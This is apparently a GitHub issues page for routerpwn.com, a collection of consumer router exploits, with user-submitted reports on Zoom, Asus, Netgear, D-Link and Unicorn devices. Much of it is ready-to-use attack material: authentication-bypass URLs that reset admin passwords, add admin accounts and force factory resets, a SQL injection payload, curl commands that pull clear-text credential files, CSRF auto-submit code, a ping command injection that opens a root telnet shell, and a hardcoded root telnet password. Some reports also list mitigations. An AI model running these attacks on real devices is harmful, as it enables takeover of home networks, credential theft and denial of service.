
routerpwn.com's People

Contributors

flex-lm, hkm


routerpwn.com's Issues

auth bypass in zoom

Vulnerable Products -

Zoom X4 ADSL Modem and Router running Nucleus/4.3
UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions
Zoom X5 ADSL Modem and Router running Nucleus/4.3
UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions

Note: A similar vulnerability was reported several years ago on the
Zoom X3 ADSL Modem using a SOAP API call. Many of these
vulnerabilities affect X3 in the same manner, without needing to use a
SOAP API.

Vulnerability-
When UPnP services and WAN http administrative access are enabled,
authorization and credential challenges can be bypassed by directly
accessing root privileged abilities via a web browser URL.

All aspects of the modem/router can be changed, altered and controlled
by an attacker, including gaining access to and changing the PPPoE/PPP
ISP credentials.

Timeline with Vendor-
Have had no response from Zoom Telephonics since first reporting the
problem on June 28. Subsequent emails have been sent with no response.

Root Cause Observed-
-As in most IGD UPnP routers and modems, where root vulnerabilities
are prevalent, these modems contain the same privileged tunnel between
either side of the router to be traversed without authentication. The
code and layout of the device plays a large role as well.

Code/Script Vulnerabilities-

-Form tags and actions ids usually hidden are easily seen from the
html source, no sanitization of client side input is occurring and
root overrides such as 'Zadv=1' can be invoked by any user.

-No cookie authentication is done once several of the first bypasses are
executed, allowing for "Cookie: sessionId=invalid" to pass admin commands.

-The SQL injection UNION SELECT 1,2,3,4,5,6,7-- added to the end of
any URL page calling a table value, such as /MainPage?id=25, will
bring up the system status page, with each interface visible and
selectable.

Patches or Fixes-
At this time, there are no known patches or fixes.

Vulnerability proofs and examples-
All administrative items can be accessed through these two URLs

--Menu Banner
http:///hag/pages/toc.htm

-Advanced Options Menu
http:///hag/pages/toolbox.htm

Example commands that can be executed remotely through a web browser
URL, or a modified HTTP GET/POST requests-

-Change Password for admin Account

On Firmware 2.5 or lower
http:///hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

On Firmware 3.0-
http:///hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

-Clear Logs
http:///Action?id=76&cmdClear+Log=Clear+Log

-Remote Reboot to Default Factory Settings-
Warning - For all intents and purposes, this action will almost always
result in a long term Denial of Service attack.
http:///Action?reboot_loc=1&id=5&cmdReboot=Reboot

-Create New Admin or Intermediate Account-
On Firmware 2.5 or lower
http:///hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

On Firmware 3.0-
http:///hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

Mitigation and Workarounds-
Adv.Options --> UPnP --> Disable UPnP --> Write Settings to Flash --> Reboot
Adv.Options --> Firewall Configuration --> Enable 'Attack Protection',
'DoS Protection', 'Black List' --> Write Settings to Flash
Adv.Options --> Management Control --> Disable WAN Management from all
fields --> Write Settings to Flash
Always change the default Username and Password, though this will
not help mitigate this vulnerability
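A log-side detection check for the request shapes this advisory lists (the Zadv=1 root override, the doubled id= parameter in the password-change URL, the UNION SELECT payload in an id value, and the /Action reboot). This is an added example, not code from the advisory or from routerpwn; the access-log lines are constructed and the 192.168. LAN prefix is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format; hosts and timestamps are made up).
# The request targets mirror the URLs listed in the advisory above.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2013:10:02:11 +0000] "GET /hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&new_pass1=x&new_pass2=x&id=3 HTTP/1.1" 200 512
192.168.1.20 - - [01/Jul/2013:10:03:01 +0000] "GET /hag/pages/toc.htm HTTP/1.1" 200 2048
203.0.113.7 - - [01/Jul/2013:10:04:44 +0000] "GET /MainPage?id=25%20UNION%20SELECT%201,2,3,4,5,6,7-- HTTP/1.1" 200 900
203.0.113.7 - - [01/Jul/2013:10:05:10 +0000] "GET /Action?reboot_loc=1&id=5&cmdReboot=Reboot HTTP/1.1" 200 128
192.168.1.20 - - [01/Jul/2013:10:06:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 4000
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)')
UNION_RE = re.compile(r'union\s+select', re.IGNORECASE)


def classify(target):
    """Return finding labels for one request target; [] means nothing matched."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    findings = []
    if qs.get('Zadv') == ['1']:                    # hidden root override parameter
        findings.append('Zadv-root-override')
    if len(qs.get('id', [])) > 1:                  # two id= values, as in the password-change URL
        findings.append('duplicate-id-param')
    if any(UNION_RE.search(v) for vals in qs.values() for v in vals):
        findings.append('sqli-union-select')
    if parts.path == '/Action' and 'cmdReboot' in qs:
        findings.append('remote-reboot')
    return findings


def scan(log_text, lan_prefix='192.168.'):
    """Return (source, target, findings) for every suspicious request.
    Any /hag/ admin page reached from outside the assumed LAN prefix is flagged
    on its own, since WAN management is what makes the bypass remote."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, target = m['src'], m['target']
        findings = classify(target)
        if target.startswith('/hag/') and not src.startswith(lan_prefix):
            findings.append('wan-side-admin-access')
        if findings:
            hits.append((src, target, findings))
    return hits
```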

Spanish generators

ARCADYAN Routers GENERATOR (10 possible keys)

EXPLOIT :
http://hwagm.elhacker.net/wlan4xx-generador-de-clave-wep-de-fabrica-para-redes-wlanxxxxxx/
http://www.seguridadwireless.net/archivos/wlan4xx-0.2.0.tar.gz

I think I have seen the Germans' JS, it is practically the same. In
fact, we talked with them

COMTREND GENERATOR (direct key)

FLAW :
http://foro.seguridadwireless.net/desarrollo-112/fallo-de-seguridad-en-routers-comtrend-full-disclosure/
EXPLOIT :
http://foro.seguridadwireless.net/aplicaciones-y-diccionarios-linux/wpamagickey-claves-por-defecto-wlan_xxxx-jazztel_xxxx-routers-comtrend-35300/

WPS Pin Belkin

FLAW : http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6371
http://ednolo.alumnos.upv.es/?p=1295

Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000

Almost no Routerpwn function works!

Hey!!!

I don't know what is wrong with routerpwn, but almost none of the generators work, such as the Arris one or mac2wepkey. A quote mark or something must have gone missing; it needs debugging, since almost nothing works. I just restored the version I had before and that didn't work either. Modify the latest version so that it works properly.

URGENT!

Regards.

Asus password disclosure

Note: In June I released a partial disclosure for just the RT-N66U on
the issue of directory traversal. I have only heard back from ASUS
twice on the issue, and I understand they are working on a fix.
However, no serious attempt to our knowledge has been made to warn
their customers in the meantime, even after multiple requests from
several different security professionals.

Nor has ASUS posted a disclosure of these serious issues to new
potential customers on their AiCloud web adverts, since they still
advertise the product as an add-on with these routers, as a safe and
bug free home cloud solution.

Linux 2.6.xx kernel

All firmware versions known

Vulnerable Asus Models

RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router
RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router
RT-N66R Dual-Band Wireless-N900 Gigabit Router with 4-Port Ethernet Switch
RT-N66U Dual-Band Wireless-N900 Gigabit Router
RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router
RT-N56R Dual-Band Wireless-AC1200 Gigabit Router
RT-N56U Dual-Band Wireless-AC1200 Gigabit Router
RT-N14U Wireless-N300 Cloud Router
RT-N16 Wireless-N300 Gigabit Router
RT-N16R Wireless-N300 Gigabit Router


Vulnerabilities - Due in large part to an exposed $root share on the
NVRAM for Samba service, which was discovered in March of this year by
another researcher, on almost all of the above models that have
enabled AiCloud service, the end users will find themselves exposed to
multiple methods of attack and several dangerous remote exploits.

Since authentication can be simply bypassed on those units running
HTTPS WebDav via directory traversal, access to all files which
control services on either side of the router are wide open to remote
manipulation. All pem and key files are also openly available.

Credentials-
Almost all models will disclose a clear text credential file, making
any MD5 hashing on the /etc/shadow file meaningless. This file below
remains easily accessible, and has no encryption. It may vary a bit in
where it sits on a small percentage of routers configured a certain
way.

(The -L and -v switches are optional)

curl -v https:///smb/tmp/$dir/lighttpd/permissions -k -L
or
curl -v https:///smb/tmp/lighttpd/permissions -k -L

PPTP Tunnel-
VPN service can be enabled, configured and connected by altering
five small files on any of the four models of the RT66 series routers.
Everything needed to achieve this can be found in the directory at
/smb/tmp/$dir/pptpd, and the pptpctrl file as well as pptpd service
are in the /sbin dir.

Local executable or modifiable scripts-
The files needed to create a Dropbear ssh service can be found at
/smb/tmp/etc/dropbear/ with its pid sitting in /var. In /smb/tmp/bin
and /smb/tmp/sbin sit well over a dozen executables such as netcat,
ftpget, logger, wol, tr and sendmail. Several services, two of which
being /smb/sbin/vsftpd and /smb/sbin/telnetd can be configured or
altered there too. Other shell scripts, not native to the routers, can
be uploaded and used in an attack with little difficulty.

On the RT-N16 and N16R, once the https credentials are entered, an
attacker can easily move to the admin console on the LAN side by
changing the path to /index.asp. While the list of tools available to
an attacker might seem endless, there is no doubt that once the
AiCloud service is enabled, it would take just one person a few
minutes to take complete control of all traffic coming in and out of the
LAN, gain access to all LAN side resources by a VPN or through another
service, and could choose to sniff packets, do a hard DoS or launch
attacks on other systems.

Mitigation and Workarounds-
Disable all UPnP services
Disable any and all of the three AiCloud items which will open the vulnerability
Remove any remote access to the router for administration until a patch is ready
Change the default username and password
If the AiCloud service is used, it would be advisable to change that
password if it was the same one used for the router

Netgear N300 DGN2200 uPnP CSRF?

4/26/2014 23:43:52 "How about uPnP CSRF?

Netgear N300 DGN2200
according to http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-(AIS-2014
http://osvdb.org/103230

Netgear WNDR3400v3
according to http://disconnected.io/2014/03/18/how-i-hacked-your-router/
Netgear DG384v5
(tested myself)

PoC taken from the BAE report

<textarea id="1" name="1" width="80" height="25"> hax3 0 192.168.0.1 1 8888 TCP 80 </textarea>

<input type="submit" >

<script>document.forms[0].submit();</script>

Secondly the BAE report for DGN2200 also has a command injection / CSRF for the ping diagnostic page, which worked great on my DG834Gv5. (I just used the Firefox debugger's Net tab, with "Edit and Resend"). I quote:

Example exploitation to obtain a file and directory listing:

POST /ping.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 81
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin: http://192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://192.168.0.1/DIAG_diag.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls

To get an interactive shell,

  1. Send the following POST data:
    IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
  2. Telnet to port 90" Alan Jenkins
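The fix on the firmware side for the ping diagnostic injection quoted above is to allow-list the target syntax and never hand the value to a shell. This is an added example written in Python, not code from the Netgear firmware or the BAE report; the two form bodies are constructed from the POST data shown in the post.

```python
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs

# Constructed form bodies. The first repeats the injected shape quoted from the
# BAE report above; the second is what a legitimate diagnostic request looks like.
INJECTED_BODY = "IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls"
BENIGN_BODY = "IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=10&ping=xxxx&ping_IPAddr=192.168.0.10"

# RFC 1123 hostname: labels of letters, digits and hyphens, nothing else.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*'
    r'[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$')


def validate_target(value):
    """Allow-list the ping target: a literal IP address or a plain hostname.

    Anything else (pipes, spaces, slashes, a leading dash that could become an
    option) is rejected before it can reach a command line.
    """
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"invalid ping target: {value!r}")


def build_ping_argv(form_body):
    """Parse the POST body and return an argv list; no shell is ever involved."""
    fields = parse_qs(form_body, strict_parsing=True)
    target = validate_target(fields["ping_IPAddr"][0])
    return ["ping", "-c", "4", target]


def run_ping(form_body, timeout=20):
    """Run the diagnostic with a list argv (shell=False), so the target is one argument."""
    proc = subprocess.run(build_ping_argv(form_body), capture_output=True,
                          text=True, timeout=timeout)
    return proc.returncode, proc.stdout
```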

Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

Exploit Title: Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

Exploit Author: absane

Blog: http://blog.noobroot.com

Discovery date: October 29th 2013

Vendor Homepage: http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr

Tested on: Unicorn WB-3300NR v1.0

Firmware Version: V5.07.18_ko_UIS02


Vulnerability


The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.
Considering that by default the administrative pages do not require authentication, countless exploits exist.


Proof of Concept


  1. Factory Reset
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe> <script>document.csrf_form.submit();</script>
  2. Alter the DNS Settings
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe> <script>document.csrf_form.submit();</script>
  3. WPA Password Disclosure (possibility)(not proven)

The following PoC code only demonstrates that with CSRF and XSS, it might be possible to obtain the WPA password.
However, I have been unable to do so without forcing the router to revert to factory defaults.

<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe> <script>document.csrf_form.submit();</script>

DIR-514

The DIR-514 A1 has telnetd listening on port 2300 and the credentials are "root:amittima". I suppose the developers didn't want to solder the microscopic UART pads...
With a little googling I found that other devices with Ralink chipsets have the same passwd...

On the other hand, the httpd has an unauthenticated alias to "/", which is at:
192.168.0.1/uir//
This path equivalence is used to access:
192.168.0.1/uir//ram/www/rebo.htm

by flexlm

https://www.underground.org.mx/index.php?topic=29919.msg149786;topicseen#msg149786

Contribution: DLink Authentication Bypass 11/09/10 also affect...

"DLink Authentication Bypass 11/09/10 also affect DLink DAP-2553
(in your list: DIR-615, DIR-320, DIR-300 Authentication Bypass)
(reference: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf)

I also discovered the possibility of reading the admin password by loading
http://192.168.0.1/tool_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0
(instead of http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0)
and changing the input type of form element "old_password" from "password" to "text"
The admin password will be shown in plain text! ;-D"

Lorenzo Santina BigNerd95

Complete, Persistent Compromise of Netgear Wireless Routers

You skipped straight to the good stuff didn't you? That's cool. Here's the deal. If you browse to http:///BRS_02_genieHelp.html, you are allowed to bypass authentication for all pages in the entire administrative interface. But not only that, authentication remains disabled across reboots. And, of course if remote administration is turned on, this works from the frickin' Internet.

http://shadow-file.blogspot.mx/2013/10/complete-persistent-compromise-of.html
